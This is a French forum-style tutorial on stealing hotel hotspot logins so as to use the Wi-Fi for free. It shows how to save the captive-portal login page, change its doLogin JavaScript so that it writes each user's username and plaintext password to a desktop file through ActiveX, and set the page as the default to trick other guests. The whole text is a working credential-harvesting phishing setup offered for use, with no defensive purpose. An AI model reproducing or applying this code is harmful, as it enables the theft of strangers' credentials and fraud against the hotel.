Cracker le hotspot d'un hôtel

Bonjour,

Je vais vous montrez comment utiliser le hotspot d'un hôtel sans débourser le moindre centime !
Comment récupérer les identifiants de connexion HotSpot sans Sniffer,sans Keylogger.

Si on ne dispose pas de pc pour sniffer les login et mot de passe qui sont dans ce cas précis cryptée a l’aide d'un script JavaScript très utile pour crypter le mot de passe avant de l’envoyer . Il dispose de 4 fonctions :

- function hexMD5 (str)
- function hexMD5w(str)
- function b64MD5 (str)
- function b64MD5w(str)
- function calcMD5(str)

L’idée est de stocker les informations d’authentification sur le pc lui-même et les récupérer âpres la connexion des utilisateurs qui son munie d'un login et un mot de passe d’Access.

Comme on n'a pas d’outils à installer comme un Keylogger on :

- 1. Enregistre la page d’authentifications html
- 2. Modifie l’action Script du formulaire pour enregistrer les mots de passes avant de s’authentifier
- 3. Lance la page comme page par défaut pour tromper les utilisateurs

Pour coder un script qui enregistre les données de la page web sur le bureau il faut activer les contrôle ActiveX sous internet explorer outil > option internet > sécurité > Personnaliser le niveau>Contrôle ACtiveX

Sur la Page d authentification on retrouve le code : 

Code:

[/b] [b]function doLogin() {      document.sendin.username.value = document.login.username.value;      document.sendin.password.value = hexMD5(‘\155′ +  document.login.password.value +  ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);      document.sendin.submit();      }

On rajoute :

Code:

[/b] [b]function doLogin() {      var fso=new ActiveXObject(« Scripting.FileSystemObject »);      var otf=fso.OpenTextFile(« Presentation.txt », 8 ,true);      otf.WriteLine(document.login.username.value);      otf.WriteLine(document.login.password.value);      otf.Close();      }

Ce qui nous donne :

Code:

[/b] [b]function doLogin() {      var fso=new ActiveXObject(« Scripting.FileSystemObject »); //Création du Système de fichier.      var otf=fso.OpenTextFile(« Presentation.txt », 8 ,true); //Ouverture  du fichier « Presentation.txt »  //qu’on a cree sur le bureau pour ne  pas attirer l’attention      otf.WriteLine(document.login.username.value); //Ecriture de la ligne « Login ».      otf.WriteLine(document.login.password.value); //Ecriture de la ligne « pass ».      otf.Close(); //Fermeture du fichier  » Presentation.txt »      document.sendin.username.value = document.login.username.value;      document.sendin.password.value = hexMD5(‘\155′ +  document.login.password.value +  ‘\010\147\337\136\064\226\371\272\364\277\015\362\110\360\173\037′);      document.sendin.submit();      }

Il n' y plus qu'a attendre que quelqu'un ce connecte